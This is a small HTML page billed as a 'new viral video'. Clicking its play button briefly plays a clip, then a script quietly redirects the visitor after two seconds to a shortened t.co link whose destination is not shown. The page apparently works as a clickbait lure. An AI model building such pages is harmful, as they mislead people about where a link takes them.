<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>NEW VIRAL VIDEO</title>
  <meta property="og:image" content="https://i.imgur.com/RzpkuhN.png">
  <style>
    body {
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
      font-family: Arial, sans-serif;
      background-color: #f2f2f2;
    }

    .video-container {
      text-align: center;
      line-height: 100vh; /* Centra verticalmente el contenido */
    }

    h1 {
      font-size: 24px;
      margin-bottom: 20px;
    }

    .play-button {
      display: inline-block;
      padding: 15px 30px;
      border: 2px solid #FF5733;
      border-radius: 10px;
      background-color: #FF5733;
      color: #fff;
      font-weight: bold;
      text-decoration: none;
      transition: background-color 0.3s, color 0.3s, transform 0.3s;
    }

    .play-button:hover {
      background-color: #fff;
      color: #FF5733;
      transform: scale(1.1);
    }
  </style>
</head>
<meta http-equiv="cache-control" content="no-cache">
<body>
  <div class="video-container">
    <h1>PLAY VIDEO</h1>
    <a class="play-button" href="#" onclick="playVideoAndRedirect(); return false;">Click here to play the video.</a>
  </div>

  <video id="myVideo" style="display:none;" controls>
    <source src="https://i.imgur.com/wcKZfAw.mp4" type="video/mp4">
  </video>

  <script>
    function playVideoAndRedirect() {
      var video = document.getElementById("myVideo");
      video.style.display = "block";

      video.play();

      setTimeout(function() {
        window.location.href = "https://t.co/WMcAZkpW3f";
      }, 2000);
    }
  </script>
</body>
</html>
